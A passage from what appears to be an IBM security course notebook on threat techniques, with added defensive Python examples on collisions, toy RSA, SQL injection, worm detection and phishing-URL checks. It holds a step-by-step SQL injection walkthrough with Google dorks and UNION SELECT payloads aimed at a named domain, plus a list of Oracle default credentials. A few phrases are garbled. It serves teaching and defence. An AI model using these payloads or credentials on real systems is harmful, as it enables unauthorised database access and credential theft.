After capturing data chunks, they also share them among each other. The captured data chunk is then programmatically analyzed in order to create additional data sets. These data sets are created in such a way that their hash matches that of the captured chunk of data. In other words, a mathematical algorithm is used to create a set of clone data for a given data chunk and hash combination. The encryption key is further derived with the help of the resultant data set and the original data chunk. This attack takes a lot of time to carry out and is technically very complex, but if multiple power systems and programs are combined, the attack is possible.
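The arithmetic behind the ‘birthday problem paradox’, and what it means for the length of a hash or checksum, as an added example (not course material): it computes the collision probability exactly and by the usual closed-form approximation, and finds two different constructed messages whose MD5 agrees on its first 24 bits. Truncating MD5 to 24 bits is an assumption made so the search finishes in a few thousand hashes; the lesson for the defender is that the work to find a collision scales with the square root of the tag space, so a short checksum gives far less integrity than its length suggests.

```python
import hashlib
import math


def collision_probability(n, space):
    """Exact P(some pair among n uniform draws from `space` values coincides)."""
    p_all_distinct = 1.0
    for k in range(n):
        p_all_distinct *= (space - k) / space
    return 1.0 - p_all_distinct


def approx_collision_probability(n, space):
    """Closed-form approximation 1 - exp(-n(n-1)/(2*space)); accurate when n << space."""
    return 1.0 - math.exp(-n * (n - 1) / (2.0 * space))


def draws_for_even_odds(space):
    """Smallest n with collision probability >= 1/2; grows like 1.18 * sqrt(space).
    Incremental so that large spaces (e.g. 2**24) are handled without recomputing."""
    p_all_distinct, n = 1.0, 0
    while p_all_distinct > 0.5:
        p_all_distinct *= (space - n) / space
        n += 1
    return n


def truncated_tag(msg, bits=24):
    """Constructed weak integrity tag: the first `bits` bits of MD5 (bits a multiple of 8)."""
    return hashlib.md5(msg).digest()[:bits // 8]


def find_truncated_collision(bits=24):
    """Birthday search: hash distinct constructed messages until two share a tag.
    Returns (msg_a, msg_b, number_of_hashes). Expected cost is about sqrt(pi/2 * 2**bits)."""
    seen = {}
    i = 0
    while True:
        msg = f"message-{i}".encode()
        tag = truncated_tag(msg, bits)
        if tag in seen:
            return seen[tag], msg, i + 1
        seen[tag] = msg
        i += 1


if __name__ == "__main__":
    print("people for a 50% shared birthday :", draws_for_even_odds(365))
    print("draws for 50% on a 24-bit tag    :", draws_for_even_odds(2 ** 24))
    a, b, hashes = find_truncated_collision(24)
    print(f"24-bit collision after {hashes} hashes: {a!r} and {b!r}")
```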


Cryptographic Threat Techniques (31 of 66)

• Cryptographic Threat Techniques


– Mathematical Attack
• The plain text is taken as an input by any encryption process

• A mathematical formula is computed

• Attackers exploit this mathematical nature of public-key encryption

• There are many general attacks used to recover a private key


Figure 2-34. Cryptographic Threat Techniques (31 of 66) DS011.0

Notes:
Mathematical Attack
The plain text is taken as an input by any encryption process and a mathematical formula is computed. This
mathematical nature of public-key encryption is exploited by attackers in order to decrypt the sent and
received messages. For example, to attack RSA the product of two prime numbers is targeted, because the
product of the primes is an essential part of an RSA public key. The minimum sizes of public keys are kept
much larger than those of secret keys in order to account for the speed at which these attacks are carried
out; these minimum public key sizes are chosen so that the RSA public key offers comparable strength.
There are many attacks which are general in nature and are used to recover a private key. Mathematical
attacks are generally applied to individual messages only, but a private key can be recovered through a brute
force attack as well. For example, the attacker can work out the victim's private key by obtaining the victim's
well-known public key. Once the private key is found, the attacker can easily masquerade as the victim.
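The "mathematical attack" on RSA, shown as an added example that is not part of the course text: a deliberately tiny modulus (constructed primes 61 and 53) is factored by trial division, which gives the private key directly from the public key; the work-factor function shows why real moduli are thousands of bits.

```python
"""Toy RSA: recovering the private key from the public key by factoring n.

Added example, not from the course. The primes are constructed and far
too small for real use; the point is that everything an attacker needs is
the public (n, e) once n can be factored, so the modulus size is what
keeps the mathematical attack infeasible.
"""
from math import isqrt


def make_keypair(p: int, q: int, e: int = 65537):
    """Build an RSA key from two primes: public (n, e), private d."""
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse of e (Python 3.8+)
    return (n, e), d


def factor_by_trial_division(n: int):
    """Recover (p, q) from n. Feasible only because n is tiny here."""
    if n % 2 == 0:
        return 2, n // 2
    for p in range(3, isqrt(n) + 1, 2):
        if n % p == 0:
            return p, n // p
    raise ValueError("no factor found")


def private_key_from_public(n: int, e: int) -> int:
    """The attack: factor n, rebuild phi(n), derive d from e alone."""
    p, q = factor_by_trial_division(n)
    return pow(e, -1, (p - 1) * (q - 1))


def rsa_apply(m: int, exponent: int, n: int) -> int:
    """Textbook RSA: m^exponent mod n (encrypt with e, decrypt with d)."""
    return pow(m, exponent, n)


def trial_divisions_needed(modulus_bits: int) -> int:
    """Rough count of odd trial divisors up to sqrt(n) for an n of this size."""
    return 2 ** (modulus_bits // 2 - 1)


def demo():
    """Victim encrypts 42; attacker decrypts it with the recovered key."""
    public, d_true = make_keypair(61, 53, e=17)  # constructed toy key
    n, e = public
    d_recovered = private_key_from_public(n, e)
    ciphertext = rsa_apply(42, e, n)
    plaintext = rsa_apply(ciphertext, d_recovered, n)
    return d_true, d_recovered, plaintext


if __name__ == "__main__":
    print("toy key:", demo())
    # Why key size matters: the same loop for a 2048-bit modulus.
    print("divisions for 2048-bit n:", trial_divisions_needed(2048))
```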


Threat Techniques (32 of 66)

• Database Threat Techniques

– Databases are one of the most compromised assets

– They hold all the critical data and are thus always targeted

– Compromising a database would mean getting all the critical data that an organization has


Figure 2-35. Threat Techniques (32 of 66) DS011.0

Notes:
Database Threat Techniques
Databases are one of the most compromised assets according to the 2014 Verizon Data Breach Report. The
reason databases are targeted so often is quite simple: they are at the heart of any organization, storing
customer records and other confidential business data. The slides that follow show some of the techniques
by which the data in an organization's database is targeted.


Threat Techniques (33 of 66)

• Database Threat Techniques


– SQL Injection
• The most famous and common method of hacking a database

• The database of any website can be accessed by an unauthorized person

• All the detail of the database can be acquired by the attacker


Figure 2-36. Threat Techniques (33 of 66) DS011.0

Notes:
SQL injection
At present, the most famous and common method of hacking is carried out by SQL injection. The database
of any website can be accessed by an unauthorized person using this method, and all the details of the
database can be acquired by the attacker. Below are some of the ways in which this type of attack can be
carried out:
- Logins can be bypassed
- Secret data can be accessed
- Website content can be modified
- The MySQL server can be shut down
Below is a diagram which shows the steps taken for a SQL injection to be carried out.


Threat Techniques (34 of 66)


Figure 2-37. Threat Techniques (34 of 66) DS011.0

Notes:
The steps involved in carrying out this database threat technique are shown in the figure. These steps are
discussed in more detail in the slides which follow.


Threat Technique (35 of 66)

• Database Threat Techniques


– SQL Injection
• Step 1: Finding Vulnerable Website

• Step 2: Checking the Vulnerability

• Step 3: Finding Number of Columns

• Step 4: Displaying the vulnerable Column

• Step 5: Finding Version, database and User

• Step 6: Finding the Table Name

• Step 7: Finding the Column Name

• Step 8: Finding the Admin Panel


Figure 2-38. Threat Technique (35 of 66) DS011.0

Notes:
Step 1: Finding Vulnerable Website: Websites which are vulnerable to external hacking can be found by
using Google search tricks known as Google dorks. To use a Google dork, a search expression such as one of
the following is entered into the Google search engine.
For example: inurl:index.php?id=, inurl:gallery.php?id=, inurl:article.php?id=, inurl:pageid=
The Google search engine then returns a list of potentially vulnerable websites matching the expression. The
vulnerability present on a website can then be checked by visiting it.
Step 2: Checking the Vulnerability: The single quote (') is used to check the vulnerability of the website.
This single quote is appended to the URL, which is then requested. There should be no space between the last
digit of the URL and the single quote.
For example: http://www.skillcube.in/index.php?id=2'
The website is not vulnerable if the new URL leads to the same page or shows that the page is not found. If an
error associated with the SQL query is shown, then the website is vulnerable.
For example: If a SQL syntax error is generated which says "check the manual that corresponds to your
MySQL server version for the right syntax", then the website is vulnerable.

Step 3: Finding Number of columns: The next step involves finding the number of columns in the website's
table. It is already known that the website is vulnerable. Now the single quote which was used earlier is
replaced by an "order by n" statement. Make sure that a space is left between "order by" and the number. The
n is then changed to 1, 2, 3 and so on. This process is repeated until an error is generated on the website.
For example:
http://www.skillcube.in/index.php?id=2 order by 1
http://www.skillcube.in/index.php?id=2 order by 2
http://www.skillcube.in/index.php?id=2 order by 3
http://www.skillcube.in/index.php?id=2 order by 4
The number is increased until the error "unknown column" is generated. If the error is generated while using
the "xth" number, then the number of columns is "x-1", that is:
http://www.skillcube.in/index.php?id=2 order by 1 (no error)
http://www.skillcube.in/index.php?id=2 order by 2 (no error)
http://www.skillcube.in/index.php?id=2 order by 3 (no error)
http://www.skillcube.in/index.php?id=2 order by 4 (no error)
http://www.skillcube.in/index.php?id=2 order by 5 (no error)
http://www.skillcube.in/index.php?id=2 order by 6 (no error)
http://www.skillcube.in/index.php?id=2 order by 7 (no error)
http://www.skillcube.in/index.php?id=2 order by 8 (error)
Thus here x=8, so the number of columns is x-1, that is 7. Sometimes the above may not work; in that case
adding "--" at the end of the statement might work.
For example: http://www.skillcube.in/index.php?id=2 order by 1--
Step 4: Displaying the vulnerable columns: The vulnerable columns of the table can be found by using a
"union select" statement followed by the column sequence. The "order by n" statement is replaced by this
statement, and the id value is changed to a negative value. The column sequence is the numbers from 1 to
x-1 (the number of columns), separated by commas.
For example: If 7 is the number of columns then the query which will be generated is:
http://www.skillcube.in/index.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7…
The method below must be tried in case the method above does not work:
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, 3, 4, 5, 6, 7…
This query will show the numbers of the columns which are displayed on the page.
Step 5: Finding version, database and user: The numeral 3 shown by the query above must now be replaced
with "version()".
For example: http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, version(), 4, 5, 6, 7…
The version will now be shown, for example as 4.3 or 5.0.1. In order to find the user or the database, version()
is replaced by user() and database() respectively.
For example:
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, database(), 4, 5, 6, 7…
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, user(), 4, 5, 6, 7…
Step 6: Finding the table name: The steps below must be followed if the version is 5 or above:


The 3 in the query must be replaced with group_concat(table_name), and "from information_schema.tables
where table_schema=database()" must be added to the query.
For example:
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, group_concat(table_name),4,5,6,7 from
information_schema.tables where table_schema=database()--
The table associated with the users or the admin must then be found and selected. If the version is 4 or
something else, the table names must be guessed.
Step 7: Finding the column name: group_concat(table_name) must now be replaced by
group_concat(column_name), and "from information_schema.tables where table_schema=database()--" must be
replaced by "from information_schema.columns where table_name=mysqlchar--".
The MySQL CHAR() string must be used to convert the name of the table. The following steps are taken to
find the name of the column:
Install the Hack Bar add-on to find the MySQL CHAR() form of the table name.
First select SQL, then the MySQL option, then MySQL CHAR(). A small window opens where the name of
the table must be entered.
Step 8: Finding the admin panel: The Hack Bar now shows the CHAR codes, separated by commas. This
code is pasted into the URL in place of mysqlchar.
For example: http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, group_concat
(column_name), 4, 5, 6, 7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105,
110)… Now it will show the list of columns, like
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
group_concat(column_name) must now be replaced by group_concat(columnname,0x3a,anothercolumnname),
with the listed column names substituted for columnname and anothercolumnname, and "from
information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" must be replaced by "from
table_name".
Now the process asks for the user name and its associated password to be entered. In case the website is
jock-botted by the members of the organization, the list of usernames and passwords can be acquired.
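The defender's view of steps 2 to 4 above, as an added example that is not part of the course: the same probes (a stray quote, "order by n", "union select") are run against a query built by string pasting and against a parameterized one, using Python's built-in sqlite3 and a constructed three-column article table plus an admin table.

```python
"""SQL injection probes against a string-built query and a bound-parameter query.

Added example, not from the course. Schema and row values are constructed;
the target table has three columns, so the union probe uses three terms
instead of the seven in the course's walkthrough.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema: a public article table and an admin table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO article VALUES (1, 'Hello', 'first post');
        INSERT INTO article VALUES (2, 'News', 'second post');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-secret');
        """
    )
    return con


def get_article_vulnerable(con, raw_id: str):
    """The flaw: the value from index.php?id=... is pasted into the SQL text."""
    sql = f"SELECT id, title, body FROM article WHERE id = {raw_id}"
    return con.execute(sql).fetchall()


def get_article_safe(con, raw_id: str):
    """The fix: bind the value; it is only ever compared, never parsed as SQL."""
    sql = "SELECT id, title, body FROM article WHERE id = ?"
    return con.execute(sql, (raw_id,)).fetchall()


def probe(fn, con, raw_id: str) -> str:
    """Summarize what one probe yields: an SQL error, no rows, or the rows."""
    try:
        rows = fn(con, raw_id)
    except sqlite3.Error as exc:  # syntax errors, ORDER BY out of range, ...
        return f"SQL ERROR: {exc}"
    return "no rows" if not rows else repr(rows)


# Probes mirroring the course's steps 2 to 4 for a three-column table.
PROBES = {
    "normal": "2",
    "step2_quote": "2'",
    "step3_order_ok": "2 order by 3",
    "step3_order_err": "2 order by 4",
    "step4_union": "-1 union select id, username, password from admin",
}


def run_all(fn) -> dict:
    """Run every probe through fn on a fresh database."""
    con = build_db()
    return {name: probe(fn, con, raw) for name, raw in PROBES.items()}


if __name__ == "__main__":
    for label, fn in (("vulnerable", get_article_vulnerable), ("safe", get_article_safe)):
        print(f"== {label} ==")
        for name, result in run_all(fn).items():
            print(f"  {name:16s} {result}")
```

With the bound parameter the probe strings never match an integer id, so every probe except "normal" simply returns no rows and the error-based column counting and the union dump both disappear.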


Threat Techniques (36 of 66)

• Database Threat Techniques


– Voyager Beta Worm
• Step 1: Local IP address is grabbed

• Step 2: TCP Connection established

• Step 3: Hit and trial

• Step 4: Column creation

• Step 5: Repetition of process


Figure 2-39. Threat Techniques (36 of 66) DS011.0

Notes:
Voyager Beta Worm
The Voyager Beta worm uses default accounts and passwords to attack data servers. Below are the steps
which it follows:
Step 1: Voyager Beta grabs the local IP address, changes the last octet, and replaces it with 220. For
example, if local Oracle server is 1.2.3.4, it will start with 1.2.3.220.
Step 2: It attempts to establish a TCP connection to TCP port 1521, where the Oracle connection service
listens.
Step 3: After it establishes a connection, it tries a sequence of usernames and passwords, such as
‘system’/‘manager’, ‘sys’/‘change_on_install’, ‘dbsnmp’/‘dbsnmp’, ‘outln’/‘outln’, ‘scott’/‘tiger’, ‘mdsys’/‘mdsys’,
and ‘ordcommon’/‘ordcommon’.
Step 4: If it is able to authenticate, it creates a table X with column Y. It does not appear to transfer the
payload.
Step 5: It decrements the IP address to establish new connections. If it falls below a.b.c.216 (e.g., 1.2.3.216),
the process is repeated.
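Detection logic for the sweep described in steps 1 to 5, as an added example that is not part of the course: it runs over constructed login-attempt records of the kind an Oracle listener or database audit log would yield and flags a source that walks destination addresses downward from .220 on port 1521 while trying the default accounts.

```python
"""Flag a Voyager Beta-style sweep in database login records.

Added example, not from the course. The record format (timestamp, source
IP, destination IP, port, username, success flag) and all sample values
are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass

# Default account names tried by the worm, as listed in step 3 above.
DEFAULT_ACCOUNTS = {"system", "sys", "dbsnmp", "outln", "scott", "mdsys", "ordcommon"}
ORACLE_PORT = 1521


@dataclass
class LoginAttempt:
    ts: float
    src: str
    dst: str
    dport: int
    user: str
    ok: bool


def last_octet(ip: str) -> int:
    return int(ip.rsplit(".", 1)[1])


def detect_voyager_sweep(attempts, min_hosts=3, min_default_users=3):
    """Return {source: finding} for sources that match the worm's pattern."""
    by_src = defaultdict(list)
    for a in attempts:
        if a.dport == ORACLE_PORT:
            by_src[a.src].append(a)
    findings = {}
    for src, rows in by_src.items():
        rows.sort(key=lambda a: a.ts)
        # Destination hosts in the order they were first contacted.
        hosts = []
        for a in rows:
            if not hosts or hosts[-1] != a.dst:
                hosts.append(a.dst)
        octets = [last_octet(h) for h in hosts]
        descending = all(b < a for a, b in zip(octets, octets[1:]))
        default_users = {a.user.lower() for a in rows} & DEFAULT_ACCOUNTS
        if (len(hosts) >= min_hosts and descending and octets[0] == 220
                and len(default_users) >= min_default_users):
            findings[src] = {
                "hosts": hosts,
                "default_accounts_tried": sorted(default_users),
                "successful_logins": [(a.dst, a.user) for a in rows if a.ok],
            }
    return findings


# Constructed sample: one infected host sweeping 10.0.5.220 down to .218,
# plus a normal application server logging in once with its own account.
SAMPLE = [
    LoginAttempt(1.0, "10.0.5.17", "10.0.5.220", 1521, "system", False),
    LoginAttempt(1.1, "10.0.5.17", "10.0.5.220", 1521, "sys", False),
    LoginAttempt(1.2, "10.0.5.17", "10.0.5.220", 1521, "dbsnmp", False),
    LoginAttempt(2.0, "10.0.5.17", "10.0.5.219", 1521, "system", False),
    LoginAttempt(2.1, "10.0.5.17", "10.0.5.219", 1521, "scott", True),
    LoginAttempt(3.0, "10.0.5.17", "10.0.5.218", 1521, "system", False),
    LoginAttempt(3.1, "10.0.5.17", "10.0.5.218", 1521, "outln", False),
    LoginAttempt(4.0, "10.0.5.40", "10.0.5.219", 1521, "appuser", True),
]

if __name__ == "__main__":
    for src, finding in detect_voyager_sweep(SAMPLE).items():
        print(src, finding)
```

A successful login in the finding is the host to check first for the table X / column Y marker from step 4, and for whether the default account is still unlocked.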


Threat Techniques (37 of 66)

• Database Threat Techniques


– Buffer overflow
• When a program attempts to put more data in a buffer than it can hold

• In this case, a buffer is a sequential section of memory allocated to contain anything

• Writing outside the bounds of a block of allocated memory can corrupt data and ultimately crash
the program


Figure 2-40. Threat Techniques (37 of 66) DS011.0

Notes:
Buffer overflow
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or
when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential
section of memory allocated to contain anything from a character string to an array of integers. Writing
outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the
execution of malicious code. The diagram on the next slide shows the steps taken to carry out a buffer overflow.


Threat Techniques (38 of 66)


Figure 2-41. Threat Techniques (38 of 66) DS011.0

Notes:
The figure shows the steps involved in buffer overflow. These steps have been discussed in more detail in the
slides which follow.


Threat Technique (39 of 66)

• Database Threat Techniques


– Buffer overflow
• Step 1: Entrance

• Step 2: Smashing the Stack

• Step 3: Running Commands


Figure 2-42. Threat Technique (39 of 66) DS011.0

Notes:
Step 1: Entrance: The hacker must have an entrance available in order to enter a server so that he can
tamper with the buffer stack by causing an overflow or by adding commands. A Trojan horse is used for
carrying out this step, as the Trojan sets up backdoor software on the server.
Step 2: Smashing the Stack: In this step the stack is filled up with meaningless characters. Under normal
circumstances this causes the operating system to crash, as it no longer has access to what it needs to
perform its functions. The loaded machine-language commands can also be smashed by the hacker if he
wants to do more.
Step 3: Running Commands: An operating system can be commanded through the overflow of the stack
buffer, and a command shell can be created by this method. For example, by using inetd in UNIX a backdoor
can be created which can be used to manipulate the X Window session. The hacker inserts code which works
on the same principle as some very popular communication software; with this code the user can take over
control of the keyboard, the monitor and the mouse services.
If a UNIX server is attacked by creating a backdoor, the attacker will eventually succeed in carrying out the
attack and can then run a command shell. If the machine to be attacked runs on a Windows platform, the
attacker can create a program known as 'wininet.dll'. Expertise and patience are required to carry out this
kind of attack, as it is highly complicated and highly technical. Knowledge of the various languages used on a
machine and knowledge of C programming are prerequisites for carrying out this kind of attack.


Threat Techniques (40 of 66)

• Banking Fraud Techniques


– There has been a significant growth in the number of malicious applications

– Thus, a huge challenge is posed for organizations

– Local attack and remote attack are the two attack vectors which are employed by the malicious
applications


Figure 2-43. Threat Techniques (40 of 66) DS011.0

Notes:
Banking Fraud Techniques
In recent years there has been a significant growth in the number of malicious applications targeting online
banking transactions. This poses a huge challenge for the customers who use these facilities and also for the
organizations which offer them. Local attacks and remote attacks are the two attack vectors employed by
the malicious applications. In a local attack the local computer is targeted, while in a remote attack the
victim is redirected to a remote site. All these techniques are discussed in the section which follows.


Threat Techniques (41 of 66)

• Banking Fraud Techniques


– Local Attack
• A common mistake made by end users is to believe that their online banking session is perfectly safe

• Security experts continually state that everything is safe if there is a yellow padlock symbol in the
browser window

• SSL is designed as a secure tunnel from the end user computer to the bank mainframe

• This fact is exploited by the Trojan


Figure 2-44. Threat Techniques (41 of 66) DS011.0

Notes:
Local Attacks
A common mistake made by end users is to believe that their online banking session is perfectly safe when
they use an SSL connection. Security experts continually state that everything is safe if there is a yellow
padlock symbol in the browser window. But SSL is designed as a secure tunnel from the end user's computer
to the bank mainframe and does not protect the end points, such as the end user's computer. This fact is
exploited by the Trojan. The Trojan drops a DLL and registers its CLSID in the registry as a Browser Helper
Object. Now any information entered into the web page is intercepted by the Trojan before it gets encrypted
by SSL. The same functionality can also be achieved if the Trojan is injected directly into the web browser's
memory space. The Trojan bypasses the firewall installed on the desktop when it makes outgoing connections.
Following are some more local attack methods:
- Displaying a carefully crafted copy of a website on top of the official website
- Running a layered service provider (LSP) which monitors all network traffic
- Writing its own network driver


Threat Techniques (42 of 66)

• Banking Fraud Techniques


– Remote Attack
• A server which is controlled by the attacker is used in this type of attack

• Easy to follow traces were left on the log files of the web master in the previous attacks

• But presently attackers keep the resource locally and then carry out the attack.

• This process is known as phishing where the user’s account information is acquired by social
engineering practice


Figure 2-45. Threat Techniques (42 of 66) DS011.0

Notes:
Remote Attacks
A server controlled by the attacker is used in this type of attack to set up a copy of the web page that is to be
impersonated. In earlier attacks the attackers left easy-to-follow traces in the web master's log files, because
they linked directly to the original images; presently attackers keep the resources locally and then carry out
the attack. The victim is tricked into visiting the spoofed website by emails sent out through bait servers. The
emails sent by the attacker often prompt the victim to visit the online service so that some urgent data
verification can be provided or some data in the service provider's main database can be updated. This
process is known as phishing, where the user's account information is acquired by social engineering. By
using exploits and other methods, the server's real location is masked. For example, the four octets of an IP
address can be converted into a single decimal number, and a fake user-authentication part can be added to
the URL to make it look like the impersonated domain. Thus the users are fooled into believing that they will
land on their service provider's domain by clicking on the provided link, but the user goes to a different
domain. The identification of URL obfuscation has been further complicated by the introduction of
Internationalized Domain Names (IDN). IDN was announced by ICANN in July 2003. The main complication
is that characters which look alike but belong to different scripts can be replaced with one another, so
spoofing can be carried out very easily. For example, the domain name 'SkillCubeBank.ltd' can be registered
with the English character 'a' replaced by the Cyrillic character 'а'. They look identical but are actually
different. A hacker can even add an SSL padlock if a domain-validated SSL certificate is obtained.
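A link checker for the three URL tricks just described (decimal-encoded IP host, a fake user-authentication part before "@", and a look-alike domain using Cyrillic characters), as an added example that is not part of the course; the bank domain and the sample links are constructed.

```python
"""Flag phishing-style URL obfuscation before a user follows a bank link.

Added example, not from the course. Checks: the host is a bare decimal
number standing for an IPv4 address, the URL carries userinfo that looks
like a host name, or a host label mixes scripts / is not Latin (e.g. a
Cyrillic 'а' in place of Latin 'a'). Expected domain and links are constructed.
"""
import ipaddress
import unicodedata
from urllib.parse import urlsplit


def decimal_to_dotted(value: str):
    """'3232235777' -> '192.168.1.1'; None if not a bare decimal IPv4."""
    if not value.isdigit():
        return None
    number = int(value)
    if number > 0xFFFFFFFF:
        return None
    return str(ipaddress.IPv4Address(number))


def scripts_in(label: str) -> set:
    """Script names (first word of the Unicode name) of the letters in a label."""
    names = set()
    for ch in label:
        if ch.isalpha():
            names.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return names


def check_url(url: str, expected_host: str) -> list:
    """Return a list of findings; an empty list means the link is clean."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    if parts.username is not None:
        findings.append(f"userinfo before '@' looks like a host: {parts.username!r}")
    dotted = decimal_to_dotted(host)
    if dotted:
        findings.append(f"decimal host {host} is the address {dotted}")
    for label in host.split("."):
        scripts = scripts_in(label)
        if scripts and scripts != {"LATIN"}:
            findings.append(f"label {label!r} uses {'/'.join(sorted(scripts))} characters")
    expected = expected_host.lower()
    if host.lower() != expected and not host.lower().endswith("." + expected):
        findings.append(f"host {host!r} is not {expected_host}")
    return findings


# Constructed bank domain and sample links (the third contains U+0430, Cyrillic a).
BANK = "skillcubebank.ltd"
SAMPLE_LINKS = {
    "genuine": "https://www.skillcubebank.ltd/login",
    "decimal_ip": "http://www.skillcubebank.ltd@3232235777/login",
    "homoglyph": "https://www.skillcubeb\u0430nk.ltd/login",
}


def audit(links=SAMPLE_LINKS, expected_host=BANK) -> dict:
    """Check every sample link against the expected bank domain."""
    return {name: check_url(url, expected_host) for name, url in links.items()}


if __name__ == "__main__":
    for name, findings in audit().items():
        print(name, "->", findings or "clean")
```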


Banking Fraud Techniques (43 of 66)

• Banking Fraud Techniques


– Joint Forces
• Serious damage can be done by an attacker if both remote and local attacks are combined

• For example: The local hosts file of a system can be altered once the system has been infected by a
Trojan

• The local hosts file will then redirect all the requests of the user

• This kind of behavior has been observed many times in a number of threats which arise due to adware

• The SSL certificates needed can easily be created by free tools like OpenSSL


Figure 2-46. Banking Fraud Techniques (43 of 66) DS011.0

Notes:
Joint Forces
More serious damage can be done by an attacker if remote and local attacks are combined. For example,
the local hosts file of a system can be altered once the system has been infected by a Trojan. The hosts file
will then redirect all of the user's requests for the service provider to an IP address under the attacker's
control. This kind of behavior has been observed many times in a number of threats arising from adware. The
SSL certificates needed can easily be created with free tools like OpenSSL. Thus the attacker is able to
generate official-looking SSL connections from the infected computer. The infected system connects to the
malicious server which is serving the spoofed website. There is very little chance that a user will notice these
changes which have been made to the system.


Threat Techniques (44 of 66)

• Web-application Threat Techniques


– Web security at the application level is often ignored

– Most security breaches online occur through the application rather than the server

– Some of these threat techniques are elaborated in the slides which follow


Figure 2-47. Threat Techniques (44 of 66) DS011.0

Notes:
Web-application Threat Techniques
Organizations spend millions to ensure that their online networks and servers are secure. However, Web
security at the application level is often ignored, or at least underrated. This is unfortunate, because today,
most security breaches online occur through the application rather than the server. Some of these threat
techniques are elaborated in the section which follows.


Threat Techniques (45 of 66)

• Web-application Threat Techniques


– Session Hijacking
• To sneak into a system as a genuine user and hijack a session

• An attacker can hijack a genuine user’s session by finding an established session

• Once the session has been hijacked, the attacker can stay connected for hours without arousing
suspicion

• All routed traffic destined for the user’s IP address comes to the attacker’s system


Figure 2-48. Threat Techniques (45 of 66) DS011.0

Notes:
Session Hijacking
It is easier to sneak into a system as a genuine user than to attempt to enter a system directly. An attacker
can hijack a genuine user's session by finding an established session and taking it over after the user has
been authenticated. Once the session has been hijacked, the attacker can stay connected for hours without
arousing suspicion. All routed traffic destined for the user's IP address comes to the attacker's system. During
this time, the attacker can plant backdoors or even gain additional access to a system. The hijack can be
broken down into three broad phases, which are depicted in the figure on the next slide.


Threat Techniques (46 of 66)


Figure 2-49. Threat Techniques (46 of 66) DS011.0

Notes:
This diagram illustrates the steps involved in session hijacking. These steps have been discussed in more
detail in the slides which follow.


Threat Technique (47 of 66)

• Web-application Threat Techniques


– Session Hijacking
• Step 1: Tracking the Connection

• Step 2: De-synchronizing the Connection

• Step 3: Injecting the attacker’s packet


Figure 2-50. Threat Technique (47 of 66) DS011.0

Notes:
Step1: Tracking the Connection: The attacker uses a network sniffer to track a victim and host or uses a
tool like Nmap to scan the network for a target with a TCP sequence that is easy to predict. Once the victim is
identified, the attacker captures sequence and acknowledgment numbers from the victim. Because packets
are checked by TCP through sequence and/or acknowledgment numbers, the attacker uses these numbers
to construct packets.
Step 2: Desynchronizing the Connection: When there is an established or a stable connection with no data
transmission between the host and the target then this state is called desynchronized state. When the
sequence number of the client is not equal to the acknowledgement number of the server or vice-versa, then
also the state is called desynchronized state. The sequence or the acknowledgement number of the server
must be charged by the attacker in order to desynchronize the connection between the host and the target. To
achieve this state, null data is sent by the attacker to the server in order to advance the sequence number or
the acknowledgment number of the server. This happens without the knowledge of the machine which has
been targeted as it does not registers any augmentation. For example: Before de-synchronization, the
attacker monitors the session without any kind of interference. The attacker then sends a large amount of null
data to the server. These data change the ACK number on the server but do not affect anything else. Thus,
both the target and the server are desynchronized. The connection available on the server site can also be
brought down by sending a reset flag to the server. When the setup is in its early stage, then only this occurs.
There are mainly two goals of an attacker. First is breaking the connection on the side of the server and
second is creating a different connection with the various sequence numbers. A SYN or an ACK packet is
listened by the attacker which has been sent by the server for the host. A RST packet in sent immediately by

2-56 IT Data Security © Copyright IBM Corp. 2015


Course materials may not be reproduced in whole or in part
without the prior written permission of IBM.
V10.1
Student Notebook

Uempty the attacker when the packet is detected. Also a SYN packet is sent by the attacker which is of the same
parameter as of the RST packet. Based on the SYN packet, the connection is closed and another one is
initiated. The sequence number of the SYN packet is different than the RST packet. A new connection is then
established and SYN or ACK packet is sent to the target for acknowledging it. After the RST packet is
received by the server, it closes the connection with the targeted system and another connection is initiated
which is based on the SYN packet. The packet is sent on the same port but the sequence number of the
packet is different. Now, the target is sent a SYN or ACK packet acknowledgement. An ACK packet is then
sent by the attacker after a new connection is detected. This state of the server is known as an established
state. To keep the target conversant is the main aim of this state. When the first SYN or ACK packet is
received from the server, then it must switch to establishment state. Now established but desynchronized
state is achieved on both the target and the server. FIN flag can also be used to do this, but the attack will be
given away in this way as the server will respond with an ACK. This response from the server is also known
as ACK storm.
The ACK storm is a flaw built into this method of hijacking. A TCP host that receives a segment whose
sequence number is not the one it expects answers with an ACK carrying the sequence number it does expect.
Once target and server are desynchronized, each side's ACK is unacceptable to the other, so every data
packet sets off an endless loop of acknowledgements in which both sides try to re-establish the correct
sequence, and the network fills with traffic caused by the mismatch between the ACK and SEQ numbers of
target and server. These ACK segments carry no data, so they are never retransmitted if lost; a single lost
packet is therefore enough to end the unwanted exchange between target and server.
This is possible because TCP runs over IP, which does not authenticate the source of a packet. The
desynchronization stage is added to the hijacking sequence so that the target host has no knowledge of the
attack. An attacker can also inject data toward the server without desynchronizing, and can hide its identity
by spoofing the IP address.
Step 3: Inject the attacker's packets: Once the attacker has broken the connection between the server and
the target, it can inject data into the network, or relay data from the targeted system to a malicious server
while participating actively as the man in the middle. Data can be read and injected freely.
